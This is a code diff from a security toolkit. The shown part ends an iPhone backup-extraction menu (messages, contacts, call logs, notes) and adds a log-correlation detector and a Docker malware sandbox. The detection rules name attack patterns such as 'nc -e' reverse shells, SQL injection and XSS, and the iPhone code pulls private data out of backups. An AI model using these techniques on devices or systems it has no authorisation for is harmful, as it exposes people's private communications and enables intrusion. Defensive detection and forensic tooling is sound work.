print(f" {r['count']} crash reports in {r['output_dir']}")
else:
print(f" Error: {r['error']}")
# Apps
elif choice == '20':
if not self._ensure_device(): return
t = input(" Type [user/system/all]: ").strip() or 'user'
r = m.list_apps(self.udid, app_type=t)
if r['success']:
print(f" {r['count']} apps:")
for a in r['apps']:
print(f" {a.get('bundle_id',''):<40} {a.get('name','')}")
else:
print(f" Error: {r['error']}")
elif choice == '21':
if not self._ensure_device(): return
path = input(" IPA path: ").strip()
if path:
r = m.install_app(self.udid, path)
print(f" {r.get('output', 'Done')}")
elif choice == '22':
if not self._ensure_device(): return
bid = input(" Bundle ID to remove: ").strip()
if bid:
r = m.uninstall_app(self.udid, bid)
print(f" {r.get('output', 'Done')}")
# Backup
elif choice == '30':
if not self._ensure_device(): return
enc = input(" Encrypted backup? [y/N]: ").strip().lower() == 'y'
pwd = ''
if enc:
pwd = input(" Backup password: ").strip()
print(" Creating backup (this may take several minutes)...")
r = m.create_backup(self.udid, encrypted=enc, password=pwd)
if r['success']:
print(f" Backup saved: {r['backup_path']}")
else:
print(f" Error: {r.get('output', 'Failed')}")
elif choice == '31':
r = m.list_backups()
print(f" {r['count']} backups:")
for b in r['backups']:
name = b.get('device_name', b['udid'][:12])
print(f" {name} - iOS {b.get('ios_version','')} - {b.get('size_mb',0):.0f}MB - {b.get('date','')}")
elif choice == '32':
bp = self._pick_backup()
if bp:
r = m.extract_backup_sms(bp)
if r['success']:
print(f" {r['count']} messages:")
for msg in r['messages'][:20]:
d = 'ME' if msg['is_from_me'] else msg['handle']
print(f" [{msg['date']}] {d}: {msg['text'][:60]}")
else:
print(f" Error: {r['error']}")
elif choice == '33':
bp = self._pick_backup()
if bp:
r = m.extract_backup_contacts(bp)
if r['success']:
print(f" {r['count']} contacts:")
for c in r['contacts'][:30]:
print(f" {c['first']} {c['last']} {c.get('organization','')} - {', '.join(c['values'][:3])}")
else:
print(f" Error: {r['error']}")
elif choice == '34':
bp = self._pick_backup()
if bp:
r = m.extract_backup_call_log(bp)
if r['success']:
print(f" {r['count']} calls:")
for c in r['calls'][:20]:
print(f" [{c['date']}] {c['type']:<10} {c['address']} ({c['duration']}s)")
else:
print(f" Error: {r['error']}")
elif choice == '35':
bp = self._pick_backup()
if bp:
r = m.extract_backup_notes(bp)
if r['success']:
print(f" {r['count']} notes:")
for n in r['notes'][:15]:
print(f" [{n['date']}] {n['title']}")
if n['body']:
print(f" {n['body'][:80]}")
else:
print(f" Error: {r['error']}")
elif choice == '36':
bp = self._pick_backup()
if bp:
domain = input(" Domain filter (or Enter): ").strip()
path_f = input(" Path filter (or Enter): ").strip()
r = m.list_backup_files(bp, domain=domain, path_filter=path_f)
if r['success']:
print(f" {r['count']} files:")
for f in r['files'][:30]:
print(f" [{f['domain']}] {f['path']}")
else:
print(f" Error: {r['error']}")
elif choice == '37':
bp = self._pick_backup()
if bp:
fhash = input(" File hash: ").strip()
name = input(" Output filename (or Enter): ").strip() or None
if fhash:
r = m.extract_backup_file(bp, fhash, output_name=name)
if r['success']:
print(f" Extracted: {r['path']} ({r['size']} bytes)")
else:
print(f" Error: {r['error']}")
# Filesystem
elif choice == '40':
if not self._ensure_device(): return
r = m.mount_filesystem(self.udid)
if r['success']:
print(f" Mounted at: {r['mountpoint']}")
else:
print(f" Error: {r.get('error', r.get('output'))}")
elif choice == '41':
if not self._ensure_device(): return
bid = input(" Bundle ID: ").strip()
if bid:
r = m.mount_app_documents(self.udid, bid)
if r['success']:
print(f" Mounted at: {r['mountpoint']}")
else:
print(f" Error: {r.get('error', r.get('output'))}")
elif choice == '42':
mp = input(" Mountpoint to unmount: ").strip()
if mp:
m.unmount_filesystem(mp)
print(" Unmounted.")
elif choice == '43':
if not self._ensure_device(): return
r = m.list_profiles(self.udid)
if r['success']:
print(f" {r['count']} profiles:")
for p in r['profiles']:
print(f" {p.get('id','')} - {p.get('name','')}")
else:
print(f" Error: {r['error']}")
elif choice == '44':
if not self._ensure_device(): return
path = input(" Profile path (.mobileprovision/.mobileconfig): ").strip()
if path:
r = m.install_profile(self.udid, path)
print(f" {r.get('output', 'Done')}")
elif choice == '45':
if not self._ensure_device(): return
pid = input(" Profile ID to remove: ").strip()
if pid:
r = m.remove_profile(self.udid, pid)
print(f" {r.get('output', 'Done')}")
# Network
elif choice == '50':
if not self._ensure_device(): return
lp = input(" Local port: ").strip()
dp = input(" Device port: ").strip()
if lp and dp:
r = m.port_forward(self.udid, int(lp), int(dp))
if r['success']:
print(f" Forwarding localhost:{lp} -> device:{dp} (PID: {r['pid']})")
else:
print(f" Error: {r['error']}")
elif choice == '51':
if not self._ensure_device(): return
r = m.export_recon_report(self.udid)
if r['success']:
print(f" Report: {r['report_path']}")
else:
print(" Invalid choice.")
def run():
m = IPhoneLocal()
m.run_interactive()

1447
modules/llm_trainer.py Normal file

File diff suppressed because it is too large Load Diff

1097
modules/loadtest.py Normal file

File diff suppressed because it is too large Load Diff

551
modules/log_correlator.py Normal file
View File

@@ -0,0 +1,551 @@
"""AUTARCH Log Correlator
Syslog ingestion, pattern matching, anomaly detection, alert rules,
timeline correlation, and mini-SIEM functionality.
"""
DESCRIPTION = "Log correlation & anomaly detection (mini-SIEM)"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "defense"
import os
import re
import json
import time
import threading
from pathlib import Path
from datetime import datetime, timezone
from collections import Counter, defaultdict
from typing import Dict, List, Optional, Any
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── Built-in Detection Rules ────────────────────────────────────────────────
DEFAULT_RULES = [
{
'id': 'brute_force_ssh',
'name': 'SSH Brute Force',
'pattern': r'(Failed password|authentication failure).*ssh',
'severity': 'high',
'threshold': 5,
'window_seconds': 60,
'description': 'Multiple failed SSH login attempts'
},
{
'id': 'brute_force_web',
'name': 'Web Login Brute Force',
'pattern': r'(401|403).*POST.*(login|auth|signin)',
'severity': 'high',
'threshold': 10,
'window_seconds': 60,
'description': 'Multiple failed web login attempts'
},
{
'id': 'sql_injection',
'name': 'SQL Injection Attempt',
'pattern': r"(UNION\s+SELECT|OR\s+1\s*=\s*1|DROP\s+TABLE|'--|\bSLEEP\()",
'severity': 'critical',
'threshold': 1,
'window_seconds': 0,
'description': 'SQL injection pattern detected'
},
{
'id': 'xss_attempt',
'name': 'XSS Attempt',
'pattern': r'(<script|javascript:|onerror=|onload=|<svg\s+onload)',
'severity': 'high',
'threshold': 1,
'window_seconds': 0,
'description': 'Cross-site scripting pattern detected'
},
{
'id': 'path_traversal',
'name': 'Path Traversal',
'pattern': r'(\.\./|\.\.\\|%2e%2e)',
'severity': 'high',
'threshold': 1,
'window_seconds': 0,
'description': 'Directory traversal attempt'
},
{
'id': 'priv_escalation',
'name': 'Privilege Escalation',
'pattern': r'(sudo|su\s+-|pkexec|gpasswd|usermod.*-G.*sudo)',
'severity': 'medium',
'threshold': 3,
'window_seconds': 300,
'description': 'Multiple privilege escalation attempts'
},
{
'id': 'port_scan',
'name': 'Port Scan Detected',
'pattern': r'(connection refused|reset by peer|SYN_RECV)',
'severity': 'medium',
'threshold': 20,
'window_seconds': 10,
'description': 'Rapid connection attempts indicate scanning'
},
{
'id': 'suspicious_download',
'name': 'Suspicious Download',
'pattern': r'(wget|curl|python.*http|nc\s+-e)',
'severity': 'medium',
'threshold': 1,
'window_seconds': 0,
'description': 'Potential malicious download or reverse shell'
},
{
'id': 'service_crash',
'name': 'Service Crash',
'pattern': r'(segfault|core dumped|out of memory|killed process)',
'severity': 'high',
'threshold': 1,
'window_seconds': 0,
'description': 'Service crash or OOM event'
},
{
'id': 'root_login',
'name': 'Root Login',
'pattern': r'(session opened.*root|Accepted.*root|su.*root)',
'severity': 'medium',
'threshold': 1,
'window_seconds': 0,
'description': 'Root/admin login detected'
},
]
# ── Log Parser ───────────────────────────────────────────────────────────────
class LogParser:
"""Multi-format log parser."""
SYSLOG_RE = re.compile(
r'^(\w{3}\s+\d+\s+\d{2}:\d{2}:\d{2})\s+(\S+)\s+(\S+?)(?:\[(\d+)\])?:\s*(.*)'
)
APACHE_RE = re.compile(
r'^(\S+)\s+\S+\s+\S+\s+\[([^\]]+)\]\s+"(\S+)\s+(\S+)\s+\S+"\s+(\d+)\s+(\d+)'
)
JSON_LOG_RE = re.compile(r'^\{.*\}$')
@staticmethod
def parse_line(line: str) -> Optional[Dict]:
"""Parse a single log line."""
line = line.strip()
if not line:
return None
# Try JSON format
if LogParser.JSON_LOG_RE.match(line):
try:
data = json.loads(line)
return {
'format': 'json',
'timestamp': data.get('timestamp', data.get('time', data.get('@timestamp', ''))),
'source': data.get('source', data.get('host', '')),
'program': data.get('program', data.get('service', data.get('logger', ''))),
'message': data.get('message', data.get('msg', str(data))),
'level': data.get('level', data.get('severity', 'info')),
'raw': line
}
except json.JSONDecodeError:
pass
# Try syslog format
m = LogParser.SYSLOG_RE.match(line)
if m:
return {
'format': 'syslog',
'timestamp': m.group(1),
'source': m.group(2),
'program': m.group(3),
'pid': m.group(4),
'message': m.group(5),
'raw': line
}
# Try Apache/Nginx format
m = LogParser.APACHE_RE.match(line)
if m:
return {
'format': 'apache',
'timestamp': m.group(2),
'source': m.group(1),
'method': m.group(3),
'path': m.group(4),
'status': int(m.group(5)),
'size': int(m.group(6)),
'message': line,
'raw': line
}
# Generic fallback
return {
'format': 'unknown',
'timestamp': '',
'message': line,
'raw': line
}
# ── Log Correlator Engine ────────────────────────────────────────────────────
class LogCorrelator:
"""Log correlation and anomaly detection engine."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'log_correlator')
os.makedirs(self.data_dir, exist_ok=True)
self.rules: List[Dict] = list(DEFAULT_RULES)
self.alerts: List[Dict] = []
self.logs: List[Dict] = []
self.sources: Dict[str, Dict] = {}
self._rule_hits: Dict[str, List[float]] = defaultdict(list)
self._lock = threading.Lock()
self._load_custom_rules()
self._load_alerts()
def _load_custom_rules(self):
rules_file = os.path.join(self.data_dir, 'custom_rules.json')
if os.path.exists(rules_file):
try:
with open(rules_file) as f:
custom = json.load(f)
self.rules.extend(custom)
except Exception:
pass
def _save_custom_rules(self):
# Only save non-default rules
default_ids = {r['id'] for r in DEFAULT_RULES}
custom = [r for r in self.rules if r['id'] not in default_ids]
rules_file = os.path.join(self.data_dir, 'custom_rules.json')
with open(rules_file, 'w') as f:
json.dump(custom, f, indent=2)
def _load_alerts(self):
alerts_file = os.path.join(self.data_dir, 'alerts.json')
if os.path.exists(alerts_file):
try:
with open(alerts_file) as f:
self.alerts = json.load(f)
except Exception:
pass
def _save_alerts(self):
alerts_file = os.path.join(self.data_dir, 'alerts.json')
with open(alerts_file, 'w') as f:
json.dump(self.alerts[-1000:], f, indent=2)
# ── Log Ingestion ────────────────────────────────────────────────────
def ingest_file(self, filepath: str, source_name: str = None) -> Dict:
"""Ingest log file for analysis."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
source = source_name or Path(filepath).name
parsed = 0
alerts_generated = 0
try:
with open(filepath, 'r', errors='ignore') as f:
for line in f:
entry = LogParser.parse_line(line)
if entry:
entry['source_file'] = source
self.logs.append(entry)
parsed += 1
# Run detection rules
new_alerts = self._check_rules(entry)
alerts_generated += len(new_alerts)
self.sources[source] = {
'file': filepath,
'lines': parsed,
'ingested': datetime.now(timezone.utc).isoformat()
}
if alerts_generated:
self._save_alerts()
return {
'ok': True, 'source': source,
'lines_parsed': parsed,
'alerts_generated': alerts_generated
}
except Exception as e:
return {'ok': False, 'error': str(e)}
def ingest_text(self, text: str, source_name: str = 'paste') -> Dict:
"""Ingest log text directly."""
parsed = 0
alerts_generated = 0
for line in text.strip().splitlines():
entry = LogParser.parse_line(line)
if entry:
entry['source_file'] = source_name
self.logs.append(entry)
parsed += 1
new_alerts = self._check_rules(entry)
alerts_generated += len(new_alerts)
if alerts_generated:
self._save_alerts()
return {
'ok': True, 'source': source_name,
'lines_parsed': parsed,
'alerts_generated': alerts_generated
}
# ── Detection ────────────────────────────────────────────────────────
def _check_rules(self, entry: Dict) -> List[Dict]:
"""Check log entry against detection rules."""
new_alerts = []
message = entry.get('message', '') + ' ' + entry.get('raw', '')
now = time.time()
for rule in self.rules:
try:
if re.search(rule['pattern'], message, re.I):
rule_id = rule['id']
# Threshold check
if rule.get('threshold', 1) > 1 and rule.get('window_seconds', 0) > 0:
with self._lock:
self._rule_hits[rule_id].append(now)
# Clean old hits
window = rule['window_seconds']
self._rule_hits[rule_id] = [
t for t in self._rule_hits[rule_id]
if now - t <= window
]
if len(self._rule_hits[rule_id]) < rule['threshold']:
continue
alert = {
'timestamp': datetime.now(timezone.utc).isoformat(),
'rule_id': rule_id,
'rule_name': rule['name'],
'severity': rule['severity'],
'description': rule['description'],
'source': entry.get('source_file', ''),
'log_entry': entry.get('message', '')[:200],
'raw': entry.get('raw', '')[:300]
}
self.alerts.append(alert)
new_alerts.append(alert)
except re.error:
pass
return new_alerts
# ── Rule Management ──────────────────────────────────────────────────
def add_rule(self, rule_id: str, name: str, pattern: str,
severity: str = 'medium', threshold: int = 1,
window_seconds: int = 0, description: str = '') -> Dict:
"""Add custom detection rule."""
# Validate regex
try:
re.compile(pattern)
except re.error as e:
return {'ok': False, 'error': f'Invalid regex: {e}'}
rule = {
'id': rule_id, 'name': name, 'pattern': pattern,
'severity': severity, 'threshold': threshold,
'window_seconds': window_seconds,
'description': description
}
self.rules.append(rule)
self._save_custom_rules()
return {'ok': True, 'rule': rule}
def remove_rule(self, rule_id: str) -> Dict:
"""Remove a custom rule."""
default_ids = {r['id'] for r in DEFAULT_RULES}
if rule_id in default_ids:
return {'ok': False, 'error': 'Cannot remove built-in rule'}
before = len(self.rules)
self.rules = [r for r in self.rules if r['id'] != rule_id]
if len(self.rules) < before:
self._save_custom_rules()
return {'ok': True}
return {'ok': False, 'error': 'Rule not found'}
def get_rules(self) -> List[Dict]:
"""List all detection rules."""
default_ids = {r['id'] for r in DEFAULT_RULES}
return [{**r, 'builtin': r['id'] in default_ids} for r in self.rules]
# ── Analysis ─────────────────────────────────────────────────────────
def search_logs(self, query: str, source: str = None,
limit: int = 100) -> List[Dict]:
"""Search ingested logs."""
results = []
for entry in reversed(self.logs):
if source and entry.get('source_file') != source:
continue
if query.lower() in (entry.get('message', '') + entry.get('raw', '')).lower():
results.append(entry)
if len(results) >= limit:
break
return results
def get_stats(self) -> Dict:
"""Get correlator statistics."""
severity_counts = Counter(a['severity'] for a in self.alerts)
rule_counts = Counter(a['rule_id'] for a in self.alerts)
source_counts = Counter(e.get('source_file', '') for e in self.logs)
return {
'total_logs': len(self.logs),
'total_alerts': len(self.alerts),
'sources': len(self.sources),
'rules': len(self.rules),
'alerts_by_severity': dict(severity_counts),
'top_rules': dict(rule_counts.most_common(10)),
'top_sources': dict(source_counts.most_common(10))
}
def get_alerts(self, severity: str = None, limit: int = 100) -> List[Dict]:
"""Get alerts with optional filtering."""
alerts = self.alerts
if severity:
alerts = [a for a in alerts if a['severity'] == severity]
return alerts[-limit:]
def clear_alerts(self):
"""Clear all alerts."""
self.alerts.clear()
self._save_alerts()
def clear_logs(self):
"""Clear ingested logs."""
self.logs.clear()
self.sources.clear()
def get_sources(self) -> Dict:
"""Get ingested log sources."""
return self.sources
def get_timeline(self, hours: int = 24) -> List[Dict]:
"""Get alert timeline grouped by hour."""
timeline = defaultdict(lambda: {'count': 0, 'critical': 0, 'high': 0, 'medium': 0, 'low': 0})
for alert in self.alerts:
ts = alert.get('timestamp', '')[:13] # YYYY-MM-DDTHH
timeline[ts]['count'] += 1
sev = alert.get('severity', 'low')
timeline[ts][sev] = timeline[ts].get(sev, 0) + 1
return [{'hour': k, **v} for k, v in sorted(timeline.items())[-hours:]]
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_log_correlator() -> LogCorrelator:
global _instance
if _instance is None:
_instance = LogCorrelator()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for Log Correlator module."""
engine = get_log_correlator()
while True:
stats = engine.get_stats()
print(f"\n{'='*60}")
print(f" Log Correlator ({stats['total_logs']} logs, {stats['total_alerts']} alerts)")
print(f"{'='*60}")
print()
print(" 1 — Ingest Log File")
print(" 2 — Paste Log Text")
print(" 3 — Search Logs")
print(" 4 — View Alerts")
print(" 5 — Manage Rules")
print(" 6 — View Stats")
print(" 7 — Alert Timeline")
print(" 8 — Clear Alerts")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
filepath = input(" Log file path: ").strip()
if filepath:
result = engine.ingest_file(filepath)
if result['ok']:
print(f" Parsed {result['lines_parsed']} lines, "
f"{result['alerts_generated']} alerts generated")
else:
print(f" Error: {result['error']}")
elif choice == '2':
print(" Paste log lines (blank line to finish):")
lines = []
while True:
line = input()
if not line:
break
lines.append(line)
if lines:
result = engine.ingest_text('\n'.join(lines))
print(f" Parsed {result['lines_parsed']} lines, "
f"{result['alerts_generated']} alerts")
elif choice == '3':
query = input(" Search query: ").strip()
if query:
results = engine.search_logs(query)
print(f" {len(results)} matches:")
for r in results[:10]:
print(f" [{r.get('source_file', '?')}] {r.get('message', '')[:80]}")
elif choice == '4':
sev = input(" Severity filter (blank=all): ").strip() or None
alerts = engine.get_alerts(severity=sev)
for a in alerts[-15:]:
print(f" [{a['severity']:<8}] {a['rule_name']}: {a['log_entry'][:60]}")
elif choice == '5':
rules = engine.get_rules()
for r in rules:
builtin = ' (built-in)' if r.get('builtin') else ''
print(f" {r['id']}: {r['name']} [{r['severity']}]{builtin}")
elif choice == '6':
print(f" Logs: {stats['total_logs']}")
print(f" Alerts: {stats['total_alerts']}")
print(f" Sources: {stats['sources']}")
print(f" Rules: {stats['rules']}")
if stats['alerts_by_severity']:
print(f" By severity: {stats['alerts_by_severity']}")
elif choice == '7':
timeline = engine.get_timeline()
for t in timeline[-12:]:
bar = '#' * min(t['count'], 40)
print(f" {t['hour']} | {bar} ({t['count']})")
elif choice == '8':
engine.clear_alerts()
print(" Alerts cleared")

524
modules/malware_sandbox.py Normal file
View File

@@ -0,0 +1,524 @@
"""AUTARCH Malware Sandbox
Isolated sample detonation (Docker-based), behavior logging, API call tracing,
network activity monitoring, and file system change tracking.
"""
DESCRIPTION = "Malware detonation sandbox & analysis"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import shutil
import hashlib
import subprocess
import threading
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
try:
from core.paths import find_tool, get_data_dir
except ImportError:
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── YARA Rules (basic) ──────────────────────────────────────────────────────
BASIC_YARA_INDICATORS = {
'suspicious_imports': [
b'CreateRemoteThread', b'VirtualAllocEx', b'WriteProcessMemory',
b'NtQueryInformationProcess', b'IsDebuggerPresent',
b'GetProcAddress', b'LoadLibraryA', b'ShellExecuteA',
],
'crypto_indicators': [
b'CryptEncrypt', b'CryptDecrypt', b'BCryptEncrypt',
b'AES', b'RSA', b'BEGIN PUBLIC KEY',
],
'network_indicators': [
b'InternetOpenA', b'HttpOpenRequestA', b'URLDownloadToFile',
b'WSAStartup', b'connect', b'send', b'recv',
b'http://', b'https://', b'ftp://',
],
'persistence_indicators': [
b'CurrentVersion\\Run', b'SOFTWARE\\Microsoft\\Windows\\CurrentVersion',
b'schtasks', b'at.exe', b'HKEY_LOCAL_MACHINE', b'HKEY_CURRENT_USER',
b'crontab', b'/etc/cron',
],
'evasion_indicators': [
b'IsDebuggerPresent', b'CheckRemoteDebuggerPresent',
b'NtSetInformationThread', b'vmware', b'virtualbox', b'vbox',
b'sandbox', b'SbieDll.dll',
],
}
# ── Sandbox Engine ───────────────────────────────────────────────────────────
class MalwareSandbox:
"""Isolated malware analysis environment."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'sandbox')
os.makedirs(self.data_dir, exist_ok=True)
self.samples_dir = os.path.join(self.data_dir, 'samples')
os.makedirs(self.samples_dir, exist_ok=True)
self.reports_dir = os.path.join(self.data_dir, 'reports')
os.makedirs(self.reports_dir, exist_ok=True)
self.docker = find_tool('docker') or shutil.which('docker')
self.strace = shutil.which('strace')
self.ltrace = shutil.which('ltrace')
self.file_cmd = shutil.which('file')
self.strings_cmd = find_tool('strings') or shutil.which('strings')
self.analyses: List[Dict] = []
self._jobs: Dict[str, Dict] = {}
def get_status(self) -> Dict:
"""Get sandbox capabilities."""
docker_ok = False
if self.docker:
try:
result = subprocess.run([self.docker, 'info'],
capture_output=True, timeout=5)
docker_ok = result.returncode == 0
except Exception:
pass
return {
'docker': docker_ok,
'strace': self.strace is not None,
'ltrace': self.ltrace is not None,
'file': self.file_cmd is not None,
'strings': self.strings_cmd is not None,
'samples': len(list(Path(self.samples_dir).iterdir())),
'analyses': len(self.analyses)
}
# ── Sample Management ────────────────────────────────────────────────
def submit_sample(self, filepath: str, name: str = None) -> Dict:
"""Submit a sample for analysis."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
# Hash the sample
hashes = {}
with open(filepath, 'rb') as f:
data = f.read()
hashes['md5'] = hashlib.md5(data).hexdigest()
hashes['sha1'] = hashlib.sha1(data).hexdigest()
hashes['sha256'] = hashlib.sha256(data).hexdigest()
# Copy to samples dir
sample_name = name or Path(filepath).name
safe_name = re.sub(r'[^\w.\-]', '_', sample_name)
dest = os.path.join(self.samples_dir, f'{hashes["sha256"][:16]}_{safe_name}')
shutil.copy2(filepath, dest)
sample = {
'name': sample_name,
'path': dest,
'size': os.path.getsize(dest),
'hashes': hashes,
'submitted': datetime.now(timezone.utc).isoformat()
}
return {'ok': True, 'sample': sample}
def list_samples(self) -> List[Dict]:
"""List submitted samples."""
samples = []
for f in Path(self.samples_dir).iterdir():
if f.is_file():
samples.append({
'name': f.name,
'path': str(f),
'size': f.stat().st_size,
'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat()
})
return samples
# ── Static Analysis ──────────────────────────────────────────────────
def static_analysis(self, filepath: str) -> Dict:
"""Perform static analysis on a sample."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
result = {
'ok': True,
'file': filepath,
'name': Path(filepath).name,
'size': os.path.getsize(filepath)
}
# File type identification
if self.file_cmd:
try:
out = subprocess.check_output([self.file_cmd, filepath],
text=True, timeout=10)
result['file_type'] = out.split(':', 1)[-1].strip()
except Exception:
pass
# Hashes
with open(filepath, 'rb') as f:
data = f.read()
result['hashes'] = {
'md5': hashlib.md5(data).hexdigest(),
'sha1': hashlib.sha1(data).hexdigest(),
'sha256': hashlib.sha256(data).hexdigest()
}
# Strings extraction
if self.strings_cmd:
try:
out = subprocess.check_output(
[self.strings_cmd, '-n', '6', filepath],
text=True, timeout=30, stderr=subprocess.DEVNULL
)
strings = out.strip().split('\n')
result['strings_count'] = len(strings)
# Extract interesting strings
urls = [s for s in strings if re.match(r'https?://', s)]
ips = [s for s in strings if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', s)]
emails = [s for s in strings if re.match(r'[^@]+@[^@]+\.[^@]+', s)]
paths = [s for s in strings if s.startswith('/') or '\\' in s]
result['interesting_strings'] = {
'urls': urls[:20],
'ips': list(set(ips))[:20],
'emails': list(set(emails))[:10],
'paths': paths[:20]
}
except Exception:
pass
# YARA-like signature matching
indicators = {}
for category, patterns in BASIC_YARA_INDICATORS.items():
matches = [p.decode('utf-8', errors='replace') for p in patterns if p in data]
if matches:
indicators[category] = matches
result['indicators'] = indicators
result['indicator_count'] = sum(len(v) for v in indicators.values())
# PE header analysis
if data[:2] == b'MZ':
result['pe_info'] = self._parse_pe_header(data)
# ELF header analysis
if data[:4] == b'\x7fELF':
result['elf_info'] = self._parse_elf_header(data)
# Risk score
score = 0
if indicators.get('evasion_indicators'):
score += 30
if indicators.get('persistence_indicators'):
score += 25
if indicators.get('suspicious_imports'):
score += 20
if indicators.get('network_indicators'):
score += 15
if indicators.get('crypto_indicators'):
score += 10
result['risk_score'] = min(100, score)
result['risk_level'] = (
'critical' if score >= 70 else
'high' if score >= 50 else
'medium' if score >= 30 else
'low' if score >= 10 else
'clean'
)
return result
def _parse_pe_header(self, data: bytes) -> Dict:
"""Basic PE header parsing."""
info = {'format': 'PE'}
try:
import struct
e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
if data[e_lfanew:e_lfanew+4] == b'PE\x00\x00':
machine = struct.unpack_from('<H', data, e_lfanew + 4)[0]
info['machine'] = {0x14c: 'i386', 0x8664: 'x86_64', 0x1c0: 'ARM'}.get(machine, hex(machine))
num_sections = struct.unpack_from('<H', data, e_lfanew + 6)[0]
info['sections'] = num_sections
timestamp = struct.unpack_from('<I', data, e_lfanew + 8)[0]
info['compile_time'] = datetime.fromtimestamp(timestamp, timezone.utc).isoformat()
except Exception:
pass
return info
def _parse_elf_header(self, data: bytes) -> Dict:
"""Basic ELF header parsing."""
info = {'format': 'ELF'}
try:
import struct
ei_class = data[4]
info['bits'] = {1: 32, 2: 64}.get(ei_class, 0)
ei_data = data[5]
info['endian'] = {1: 'little', 2: 'big'}.get(ei_data, 'unknown')
e_type = struct.unpack_from('<H', data, 16)[0]
info['type'] = {1: 'relocatable', 2: 'executable', 3: 'shared', 4: 'core'}.get(e_type, str(e_type))
except Exception:
pass
return info
# ── Dynamic Analysis (Docker) ────────────────────────────────────────
def dynamic_analysis(self, filepath: str, timeout: int = 60) -> str:
"""Run sample in Docker sandbox. Returns job_id."""
if not self.docker:
return ''
job_id = f'sandbox_{int(time.time())}'
self._jobs[job_id] = {
'type': 'dynamic', 'status': 'running',
'result': None, 'started': time.time()
}
def _run():
try:
container_name = f'autarch_sandbox_{job_id}'
sample_name = Path(filepath).name
# Run in isolated container
cmd = [
self.docker, 'run', '--rm',
'--name', container_name,
'--network', 'none', # No network
'--memory', '256m', # Memory limit
'--cpus', '1', # CPU limit
'--read-only', # Read-only root
'--tmpfs', '/tmp:size=64m',
'-v', f'{os.path.abspath(filepath)}:/sample/{sample_name}:ro',
'ubuntu:22.04',
'bash', '-c', f'''
# Log file operations
cp /sample/{sample_name} /tmp/test_sample
chmod +x /tmp/test_sample 2>/dev/null
# Try to run with strace if available
timeout {timeout} strace -f -o /tmp/trace.log /tmp/test_sample 2>/tmp/stderr.log || true
cat /tmp/trace.log 2>/dev/null | head -1000
echo "---STDERR---"
cat /tmp/stderr.log 2>/dev/null | head -100
'''
]
result = subprocess.run(cmd, capture_output=True, text=True,
timeout=timeout + 30)
# Parse strace output
syscalls = {}
files_accessed = []
network_calls = []
for line in result.stdout.split('\n'):
# Count syscalls
sc_match = re.match(r'.*?(\w+)\(', line)
if sc_match:
sc = sc_match.group(1)
syscalls[sc] = syscalls.get(sc, 0) + 1
# File access
if 'open(' in line or 'openat(' in line:
f_match = re.search(r'"([^"]+)"', line)
if f_match:
files_accessed.append(f_match.group(1))
# Network
if 'connect(' in line or 'socket(' in line:
network_calls.append(line.strip()[:100])
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': True,
'syscalls': syscalls,
'syscall_count': sum(syscalls.values()),
'files_accessed': list(set(files_accessed))[:50],
'network_calls': network_calls[:20],
'exit_code': result.returncode,
'stderr': result.stderr[:500] if result.stderr else ''
}
except subprocess.TimeoutExpired:
# Kill container
subprocess.run([self.docker, 'kill', container_name],
capture_output=True)
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': True, 'timeout': True,
'message': 'Analysis timed out (sample may be long-running)'
}
except Exception as e:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
threading.Thread(target=_run, daemon=True).start()
return job_id
# ── Report Generation ────────────────────────────────────────────────
def generate_report(self, filepath: str, include_dynamic: bool = False) -> Dict:
"""Generate comprehensive analysis report."""
static = self.static_analysis(filepath)
report = {
'timestamp': datetime.now(timezone.utc).isoformat(),
'sample': {
'name': Path(filepath).name,
'path': filepath,
'size': static.get('size', 0),
'hashes': static.get('hashes', {})
},
'static_analysis': static,
'risk_score': static.get('risk_score', 0),
'risk_level': static.get('risk_level', 'unknown')
}
# Save report
report_name = f'report_{static.get("hashes", {}).get("sha256", "unknown")[:16]}.json'
report_path = os.path.join(self.reports_dir, report_name)
with open(report_path, 'w') as f:
json.dump(report, f, indent=2)
report['report_path'] = report_path
self.analyses.append({
'name': Path(filepath).name,
'report': report_path,
'risk': report['risk_level'],
'timestamp': report['timestamp']
})
return {'ok': True, **report}
def list_reports(self) -> List[Dict]:
"""List analysis reports."""
reports = []
for f in Path(self.reports_dir).glob('*.json'):
try:
with open(f) as fh:
data = json.load(fh)
reports.append({
'name': f.name,
'path': str(f),
'sample': data.get('sample', {}).get('name', ''),
'risk': data.get('risk_level', 'unknown'),
'timestamp': data.get('timestamp', '')
})
except Exception:
pass
return reports
# ── Job Management ───────────────────────────────────────────────────
def get_job(self, job_id: str) -> Optional[Dict]:
return self._jobs.get(job_id)
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_sandbox() -> MalwareSandbox:
global _instance
if _instance is None:
_instance = MalwareSandbox()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for Malware Sandbox module."""
sandbox = get_sandbox()
while True:
status = sandbox.get_status()
print(f"\n{'='*60}")
print(f" Malware Sandbox")
print(f"{'='*60}")
print(f" Docker: {'OK' if status['docker'] else 'NOT AVAILABLE'}")
print(f" Samples: {status['samples']} Analyses: {status['analyses']}")
print()
print(" 1 — Submit Sample")
print(" 2 — Static Analysis")
print(" 3 — Dynamic Analysis (Docker)")
print(" 4 — Full Report")
